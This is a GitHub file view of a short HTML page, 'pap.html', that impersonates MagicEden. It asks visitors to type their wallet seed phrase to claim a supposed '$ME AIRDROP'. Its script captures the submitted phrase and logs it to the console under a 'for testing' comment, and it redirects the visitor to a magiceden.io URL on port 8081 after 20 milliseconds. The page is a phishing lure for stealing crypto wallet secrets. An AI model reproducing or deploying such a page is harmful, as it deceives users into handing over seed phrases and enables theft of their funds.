-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpap.html
More file actions
26 lines (24 loc) · 873 Bytes
/
pap.html
File metadata and controls
26 lines (24 loc) · 873 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<html>
<head>
<title>magiceden.io</title>
</head>
<body>
<h1>MagicEden Wallet needs your seed phrase to claim $ME AIRDROP</h1>
<form id="seedForm">
<label for="seedPhrase">Enter your seed phrase (comma separated):</label><br>
<textarea id="seedPhrase" name="seedPhrase" rows="5" cols="50" style="width: 100%;"></textarea><br><br>
<input type="submit" value="Submit">
</form>
<script>
document.getElementById('seedForm').onsubmit = function(e) {
e.preventDefault();
const seedPhrase = document.getElementById('seedPhrase').value;
console.log('Seed phrase:', seedPhrase);
// Only log the seed phrase for testing; never do this in a real application.
};
setTimeout(function(){
location.href = "https://magiceden.io:8081";
}, 20);
</script>
</body>
</html>